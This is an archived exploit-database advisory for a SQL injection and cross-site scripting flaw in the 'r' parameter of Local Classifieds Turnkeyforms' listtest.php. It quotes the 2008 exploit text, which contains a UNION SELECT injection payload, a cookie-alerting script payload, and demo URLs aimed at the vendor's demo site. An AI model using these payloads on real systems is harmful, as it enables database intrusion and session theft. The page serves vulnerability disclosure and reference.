Local Classifieds Turnkeyforms

vendor:

Local Classifieds

by:

TR-ShaRk

7.5

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: Local Classifieds

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Local Classifieds Turnkeyforms

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'r' parameter to 'listtest.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, and to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : Admin@tr-shark.org
#
######################
#
#   Script : Local Classifieds Turnkeyforms
#
######################
#
#   SQL Injection Vuln. :
#
#   listtest.php?r=-39+union+select+1,@@version--
#
#   Xss:
#
#   listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
#   Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################

# milw0rm.com [2008-11-07]